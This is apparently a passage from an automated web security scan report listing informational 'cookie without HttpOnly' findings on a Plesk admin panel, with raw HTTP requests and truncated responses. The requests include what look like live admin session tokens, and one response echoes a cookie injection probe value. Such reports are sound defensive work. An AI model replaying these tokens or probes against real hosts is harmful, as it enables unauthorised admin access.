User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=ouhymmzgtdaqakoglnanbrbl; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; psaContext=customers

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 23:59:16 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=customers; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 23:59:15 GMT
Connection: close
Content-Length: 23868

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.18. https://50.22.21.242:8443/admin/customer/overview/id/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/customer/overview/id/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/customer/overview/id/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=ouhymmzgtdaqakoglnanbrbl; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; psaContext=customers

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 23:59:16 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=customers; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 23:59:17 GMT
Connection: close
Content-Length: 23868

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.19. https://50.22.21.242:8443/admin/customer/overview/id/3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/customer/overview/id/3

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/customer/overview/id/3 HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/admin/customer/list
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl; psaContext=customers

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 23:59:15 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=customers; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 23:59:15 GMT
Content-Length: 23421

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.20. https://50.22.21.242:8443/admin/domain/list  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/domain/list

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/domain/list?context=domains HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/admin/health/index?context=health
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl; psaContext=health

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 23:40:06 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=domains; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 23:40:07 GMT
Content-Length: 18941

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.21. https://50.22.21.242:8443/admin/health/chart-image/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/health/chart-image/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/health/chart-image/?parameterId=Services-%3ECpuTime-%3EPanel&period=now-1d&7d0259df353c8f299f74f6bbb54453f4 HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/admin/health/index?context=health
Cookie: health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl; psaContext=health

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 38170
Content-Type: image/jpg
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 23:39:56 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=health; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 23:39:56 GMT

.PNG
.
...IHDR...N...2......Q_....JtEXtSoftware.RRDtool, Tobias Oetiker <tobi@oetiker.ch>, http://tobi.oetiker.ch.k.
.. .IDATx..}..]Ey.._.Z-*..V5.#).T../....VQ.J4......EQ...%Z...^...$....`P.;V.C..4
...[SNIP]...

5.22. https://50.22.21.242:8443/admin/health/index  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/health/index

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/health/index?context=health HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/left.php3
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 23:39:42 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=health; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 23:39:42 GMT
Content-Length: 8063

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.23. https://50.22.21.242:8443/admin/health/parameters  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/health/parameters

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/health/parameters HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=ouhymmzgtdaqakoglnanbrbl; psaContext=health

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 23:39:45 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=health; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 23:39:45 GMT
Connection: close
Content-Length: 59784

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.24. https://50.22.21.242:8443/admin/home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/home

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/home HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/admin/
Cookie: PLESKSESSID=39139572be0e1777a54c9a9ae93f2e91; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 20:38:26 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 20:38:27 GMT
Connection: close
Content-Length: 16717

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.25. https://50.22.21.242:8443/admin/home/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/home/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/home/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=ouhymmzgtdaqakoglnanbrbl; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; psaContext=home

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 13:41:10 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=health; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 13:41:11 GMT
Connection: close
Content-Length: 9720

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

5.26. https://50.22.21.242:8443/admin/home/admin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/home/admin

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/home/admin HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/admin-panel=home.admin/
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=ouhymmzgtdaqakoglnanbrbl; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; psaContext=home

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 13:43:34 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=customers; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 13:43:35 GMT
Connection: close
Content-Length: 9770

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

5.27. https://50.22.21.242:8443/admin/home/click-promo/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/home/click-promo/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/home/click-promo/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; admin_report__report_id=2; psaContext=tools; sessionID=onthshevccsqtbfldgbmakbv

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 13:44:36 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=customers; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 13:44:36 GMT
Connection: close
Content-Length: 9777

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

5.28. https://50.22.21.242:8443/admin/home/click-promo/id/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/home/click-promo/id/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/home/click-promo/id/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; admin_report__report_id=2; psaContext=tools; sessionID=onthshevccsqtbfldgbmakbv

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 13:44:55 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=subscriptions; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 13:44:56 GMT
Connection: close
Content-Length: 9792

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

5.29. https://50.22.21.242:8443/admin/home/click-promo/id/promo_click_mobile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/home/click-promo/id/promo_click_mobile

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/home/click-promo/id/promo_click_mobile HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/smb/admin-home
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl
Cache-Control: max-age=0

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 13:45:13 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=resellerscbb13%22a%3D%22b%22717078d1f1a; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 13:45:16 GMT
Content-Length: 9753

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

5.30. https://50.22.21.242:8443/admin/index.php/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/index.php/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/index.php/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=39139572be0e1777a54c9a9ae93f2e91; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 20:38:29 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 20:38:30 GMT
Connection: close
Content-Length: 16717

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
